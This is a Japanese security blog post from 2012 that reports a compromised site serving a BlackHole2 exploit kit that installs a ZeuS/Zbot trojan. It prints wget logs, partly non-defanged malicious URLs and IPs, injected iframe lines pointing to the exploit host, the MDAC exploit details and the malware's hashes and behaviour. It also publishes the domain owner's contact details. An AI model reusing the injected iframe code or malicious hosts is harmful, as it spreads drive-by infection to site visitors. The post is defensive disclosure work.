水曜日, 10月 17, 2012

#OCJP-076:gracia-regalo.jpにBHEK2経由のZeusトロイダウンロードコードが発見しました!

下記のURLにBlackHole2/BHEK2のマルウェア感染仕組みを発見しました↓
hxxp://gracia-regalo.jp/public.html
↑危険ですので、外して下さい。

ドメインオーナーの情報/連絡や報告の為に↓
[名前]                          有限会社ティエラ
[Name]                          tiera
[Email]                         bin.nya@ceres.ocn.ne.jp
[郵便番号]                      532-0003
[住所]                          大阪府大阪市淀川区宮原1-19-32プライマリー新大阪405号
[Postal Address]                osaka osakacityyodogawaku 1-19
                                -32promaryshinosaka405, Osaka,
                                532-0003, japan
[電話番号]                      06-6393-6123
[FAX番号]                       06-6393-6123
ダウンロード証拠↓
--20:49:51--  hxxp://gracia-regalo.jp/public.html
           => `public.html'
Resolving gracia-regalo.jp... 211.125.95.190
Connecting to gracia-regalo.jp|211.125.95.190|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 504 [text/html]
20:49:51 (15.93 MB/s) - `public.html' saved [504/504]
中身は下記のコードを発見↓


↑ダウンロードすると…
--20:51:38--  http://xudyhbes.ru/count6.php
           => `count6.php'
Resolving xudyhbes.ru... 188.127.113.59
Connecting to xudyhbes.ru|188.127.113.59|:80... connected.
HTTP request sent, awaiting response... 302
Location: http://217.117.28.100/main.php [following]
--20:51:42--  http://217.117.28.100/main.php
           => `main.php'
Connecting to 217.117.28.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
20:51:45 (42.45 KB/s) - `main.php' saved [28802]
main.phpはBlackhole2のPluginDetectと言いますが、ここでexploitコードを実行され、
マルウェアがダウンロードされてしまいます↓
try {
  var PluginDetect = {
    version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
      return function (){
        c(b, a)
      }
    }
    , isDefined : function (b){
      return typeof b != "undefined"
       :
     SNIP!
感染情報↓
当たったEXPLOIT: CVE-2006-0003
MDAC Arbitrary file download via the Microsoft Data Access Components (MDAC) 
CreateObject BD96C556-65A3-11D0-983A-00C04FC29E36
adodb.stream msxml2.XMLHTTP
SaveToFile    .//..//39deac2.exe
Target = "hxxp://217.117.28.100/main.php?deuzw=0303353408&xyb=060a0908093436060903&khqp=04&uvu=bynafpsn&ysb=frl"
↑ダウンロードしたらマルウェアプログラムが保存されます。
--20:58:19--  http://217.117.28.100/main.php?deuzw=0303353408&xyb=060a0908093436
060903&khqp=04&uvu=bynafpsn&ysb=frl
           => `main.php@deuzw=0303353408&xyb=060a0908093436060903&khqp=04&uvu=bynafpsn&ysb=frl'
Connecting to 217.117.28.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 51,712 (51K) [application/x-msdownload]
100%[====================================>] 51,712        68.11K/s
20:58:22 (68.01 KB/s) - `main.php@deuzw=0303353408&xyb=060a0908093436060903&khqp=04&uvu=bynafpsn&ysb=frl' saved [51712/51712]
今迄の証拠を纏めたら↓
$ md5 *
public.html  569e9e36c6ab89506de7f4e5b34b25a1
main.php     edefe4284221939b7868badc2f2e4621
39deac2.exe  2113aa0cdd14fb46c2a3a765ed38da7d

$ ls 
-rwx------  51712 Oct 17 02:58 39deac2.exe
-rwx------  28802 Oct 17 02:51 main.php*
-rwx------    504 Sep 30 00:49 public.html

では、どんなマルウェアでしょうか?

見た目↓


マルウェアを実行されたら下記の動きになります↓
//マルウェアのプロセス
39deac2.exe 
  |
  +---temp79.exe // CMD ="C:\WINDOWS\Temp\temp79.exe "
         |
         +---services.exe

//保存されたファイルと立ち上がったサービス↓
temp79.exe ←--- PAYLOAD!
 drops:
    C:\WINDOWS\Temp\tmp.exe
    C:\WINDOWS\system32\Packet.dll
    C:\WINDOWS\system32\drivers\npf.sys
    C:\WINDOWS\system32\wpcap.dll
  service:
    NPF  SERVICE_DEMAND_START   system32\drivers\NPF.sys  
↑情報盗むトロイです、ZeuS/Zbotトロイですね。
ウイルスソフトの検知率はVTに確認したら8/43です↓
MD5: 2113aa0cdd14fb46c2a3a765ed38da7d
File size: 50.5 KB ( 51712 bytes )
File name: 39deac2.exe
File type: Win32 EXE
Detection: 8 / 43
Date: 2012-10-17 12:09:54 UTC ( 0 分 ago )
URL: [CLICK]

感染されたページの検知率は 22 / 43 → [CHECK]
それでPluginDetect/JSコードの検知率は 3 / 43 → [CHECK]
そして上記書いたようにマルウェア検知率は 8 / 43

【重要】追加情報、平成12年10月20日 16:59
ウェブサーバのルートDIRに同じマルウェアリンクが沢山ファイルに発見しました。
ファイル一覧は下記の画像ですので…


感染URLのgrep結果は下記となります↓
2012bacchus_cast.html(21): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";
2012bacchus_system.html(21): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";
2012bacchus_top.html(21): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";
access.html(21): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";
bacchus_cast.html(28): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";
bacchus_contact.html(28): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";
bacchus_gallery.html(54): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";
bacchus_system.html(28): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";
bacchus_top.html(28): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";
gracia_system.html(21): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";
index.html(19): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";
link.html(21): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";
recruit.html(22): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";
regalo_cast.html(21): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";
regalo_top.html(21): ifrm.src  = "hxxp://xudyhbes.ru/count6.php";

間違いなくFTPアカウントが漏れてしまいましたので、
かわいそうなので、取り急ぎご対応をお願いします!

0 件のコメント:

コメントを投稿